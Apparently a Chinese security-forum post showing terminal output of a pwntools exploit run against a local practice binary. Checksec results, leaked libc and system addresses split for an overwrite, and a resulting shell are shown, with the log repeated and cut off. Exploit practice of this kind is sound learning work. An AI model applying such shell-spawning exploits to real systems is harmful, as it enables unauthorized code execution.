dc@ubuntu:~/playground$ python payload_login.py
[+] Starting local process './login': pid 80372
[*] '/home/dc/playground/login'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x8048000)
[*] '/lib/i386-linux-gnu/libc.so.6'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled
libc_main_addr=> 0xf7df4550
sys_addr=> 0xf7e16db0
sys_addr_0_2=> 0x6db0
sys_addr_2_4=> 0xf7e1
stack_addr=> 0xff849c68
stack_addr_0_2=> 0x9c68
libc_data=> 0xf7ddc000
[*] Switching to interactive mode
sh: 1: This: not found
$ whoami
dc
dc@ubuntu:~/playground$ python payload_login.py
[+] Starting local process './login': pid 80372
[*] '/home/dc/playground/login'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x8048000)
[*] '/lib/i386-linux-gnu/libc.so.6'
    Arch:     i386-32-little
    RELRO:    Partial RELRO

[招生]科锐逆向工程师培训(2024年11月15日实地,远程教学同时开班, 第51期)

最后于 2021-5-28 13:53 被顾言庭编辑 ,原因:
收藏
免费 6
支持
分享
最新回复 (0)
游客
登录 | 注册 方可回帖
返回
//